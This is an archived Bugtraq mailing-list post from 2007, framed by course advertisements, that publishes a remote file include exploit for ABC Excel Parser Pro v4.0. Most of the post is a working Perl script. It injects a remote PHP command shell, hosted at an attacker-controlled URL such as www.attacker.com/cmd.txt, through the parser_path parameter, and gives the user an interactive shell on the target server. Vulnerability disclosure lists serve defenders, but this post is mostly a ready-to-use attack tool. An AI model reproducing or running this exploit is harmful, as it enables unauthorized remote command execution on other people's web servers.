Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

ABC Excel Parser Pro v4.0 Remote File Include Exploit

from [the_3dit0r] Network Security [Permanent Link]
Subject: ABC Excel Parser Pro v4.0 Remote File Include Exploit
Date: 20 May 2007 07:34:40 -0000 

 """""""""""""""""""""""""""""""""""""""""""""""
 """  ::     ::                :::::   ::::  """
 """   ::   ::                 ::  :   ::    """
 """     ::::    ::   :: ::::: :::::   ::::  """
 """    ::  ::   ::: ::: :: :: ::  ::    ::  """
 """  ::      :: :: :  : ::::: ::   :: ::::  """
 """                                         """
 """""""""""""""""""""""""""""""""""""""""""""""
    Xmor$ Security Vulnerability Research TM

# Tilte: ABC Excel Parser Pro v4.0 Remote File Include Exploit

# Author..................: [the_Edit0r]
# Location ...............: [Iran]
# Homepage ...............: [Www.XmorS-sEcurity.coM]
                            [Www.XmorS.coM] [Www.XmorS.neT]
# Software ...............: [ABC Excel Parser] 
# Impact..................: [Remote]
# Advisory ...............: 
[Www.XmorS-sEurity.coM/advisory/excelparser(rfi).txt]
# Site Script ............: [http://phpexcel.h11.ru/]
# We ArE .................: 
[Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel]
# SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM]
# Vulnerabilities ........: 

           
www.example.com/[path]/[path]/sample/xls2mysql/parser_path=[Shell-Script]
           

-------------------------------- Exploit 
--------------------------------------------

#!/usr/bin/perl

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET 
=>$Path.'sample/xls2mysql/parser_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die 
"\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nWellcome Command !\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: 
Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command 
Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No 
Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print " *ABC Excel Parser v4.0 Remote File Include Exploit*\r\n";
 }
sub usage()
 {
 head();
 print " Usage: Xpl.pl [target] [cmd shell location] [cmd shell 
variable]\r\n\n";
 print " <Site> - Full path to  ABC Excel Parser  ex: http://www.site.com/ 
\r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.attacker.com/cmd.txt 
\r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".  ABC Excel Parser remote Command Execution Vulnerabilities  .\n";
 print ".                                                             .\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".         Xmor$ Security Vulnerability Research TM            .\n";
 print ".                                                             .\n";
 print "...............................................................\n\n";
 exit();
 }

--------------------------------- End Codes 
------------------------------------------


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • ABC Excel Parser Pro v4.0 Remote File Include Exploit, the_3dit0r <=
Previous by Date:  NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities, Ismael Briones
Next by Date:  [Full-disclosure] [USN-463-1] vim vulnerability, Kees Cook
Previous by Thread:  NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities, Ismael Briones
Next by Thread:  [Full-disclosure] [USN-463-1] vim vulnerability, Kees Cook
Indexes:  [Date] [Thread] [Top] [All Lists]